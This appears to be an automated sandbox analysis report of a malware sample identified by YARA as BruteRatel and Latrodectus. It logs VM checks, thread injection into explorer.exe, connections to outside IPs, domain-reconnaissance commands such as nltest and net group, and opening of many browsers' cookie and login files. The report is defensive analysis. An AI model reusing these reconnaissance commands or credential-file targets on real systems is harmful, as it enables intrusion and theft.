            Source: explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
            Source: explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
            Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
            Source: explorer.exe, 00000008.00000000.2320112731.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE44B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE44B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE44B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: rundll32.exe, 00000006.00000003.2511990228.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E1B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
            Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
            Source: explorer.exe, 00000008.00000003.3220487882.0000000008920000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
            Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
            Source: explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000008.00000003.3102516031.000000000C8DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:o_
            Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
            Source: explorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
            Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
            Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
            Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
            Source: explorer.exe, 00000008.00000000.2320112731.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000008.00000000.2321862445.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\explorer.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4576DC rdtsc 8_2_0E4576DC
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC7CCE0 LdrGetProcedureAddress,3_2_000001CEAFC7CCE0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DB8990 GetLastError,IsDebuggerPresent,OutputDebugStringW,3_2_00007FF8A8DB8990
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DB8990 GetLastError,IsDebuggerPresent,OutputDebugStringW,3_2_00007FF8A8DB8990
            Source: C:\Windows\explorer.exeCode function: 8_2_0E454948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,8_2_0E454948
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4589E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,8_2_0E4589E4
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D68920 swprintf,OpenMutexW,swprintf,GetProcessHeap,HeapFree,3_2_00007FF8A8D68920
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DCCFD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF8A8DCCFD8
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D96264 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF8A8D96264
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4E1DA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0E4E1DA0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4F53A8 SetUnhandledExceptionFilter,8_2_0E4F53A8

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 104.21.68.89 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.217.190 443Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 103.57.249.207 6542Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 94.232.43.224 6542Jump to behavior
            Allocates memory in foreign processes
            Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 3030000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 8380000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 8850000 protect: page execute and read and writeJump to behavior
            Contains functionality to inject threads in other processes
            Source: C:\Windows\System32\rundll32.exeCode function: 3_3_00007DF4A9FC0100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,3_3_00007DF4A9FC0100
            Source: C:\Windows\System32\rundll32.exeCode function: 4_3_00007DF4051C0100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,4_3_00007DF4051C0100
            Source: C:\Windows\System32\rundll32.exeCode function: 6_3_00007DF445320100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,6_3_00007DF445320100
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 3030000Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 8380000Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 8850000Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 3030000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 8380000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 8850000 value starts with: 4D5AJump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\System32\rundll32.exeMemory written: PID: 1028 base: 3030000 value: 4DJump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory written: PID: 1028 base: 8380000 value: 4DJump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory written: PID: 1028 base: 8850000 value: 4DJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 412Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 412Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 412Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 412Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 412Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 4084Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 4084Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 4084Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 4084Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 4084Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 412Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 412Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 412Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 412Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 412Jump to behavior
            Sets debug register (to hijack the execution of another thread)
            Source: C:\Windows\System32\rundll32.exeThread register set: 412 1Jump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 3030000Jump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 8380000Jump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 8850000Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami /groups
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CF9AC0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,3_2_00007FF8A8CF9AC0
            Source: explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103191493.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
            Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000008.00000000.2321695887.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000008.00000000.2320112731.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4535485561.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CFDCBC WTSGetActiveConsoleSessionId,WTSEnumerateSessionsW,WTSFreeMemory,WTSQueryUserToken,GetLastError,SetupDiGetClassDevsW,GetLastError,SetupDiGetDeviceInstanceIdW,GetLastError,StrStrIW,SetupDiGetDeviceRegistryPropertyW,lstrcmpiW,CM_Get_DevNode_Status,SetupDiOpenDevRegKey,RegCloseKey,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,CloseHandle,3_2_00007FF8A8CFDCBC
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4D4F14 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_0E4D4F14
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC94D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,3_2_000001CEAFC94D00
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DE4A20 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,3_2_00007FF8A8DE4A20
            Source: C:\Windows\explorer.exeCode function: 8_2_0303891C RtlGetVersion,GetVersionExW,8_2_0303891C
            Source: C:\Windows\System32\nltest.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: WMIC.exe, 00000021.00000002.3489207530.00000156669D1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487312815.00000156669C5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488726294.00000156669CC000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487382704.00000156669CB000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488748596.00000156669D0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487514545.0000015666FA1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488702292.00000156669D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000021.00000002.3488807709.0000003146307000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ndows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000021.00000003.3488148854.0000015666F80000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489121828.00000156669B6000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487428020.00000156669B5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489100566.00000156669AA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487207652.00000156669A7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487312815.00000156669A8000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488168710.0000015666F81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected BruteRatel
            Source: Yara matchFile source: 00000003.00000003.2319042957.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4537635408.000001CEB01FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4537513322.00000233A000C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4538291850.0000027619ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.2421944396.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.2421877879.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2516556491.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2513239547.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.2319103261.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4084, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 412, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6564, type: MEMORYSTR
            Yara detected Latrodectus
            Source: Yara matchFile source: 00000008.00000002.4549377026.000000000977A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Contains functionality to steal Internet Explorer form passwords
            Source: C:\Windows\explorer.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage28_2_0E458848
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login DataJump to behavior
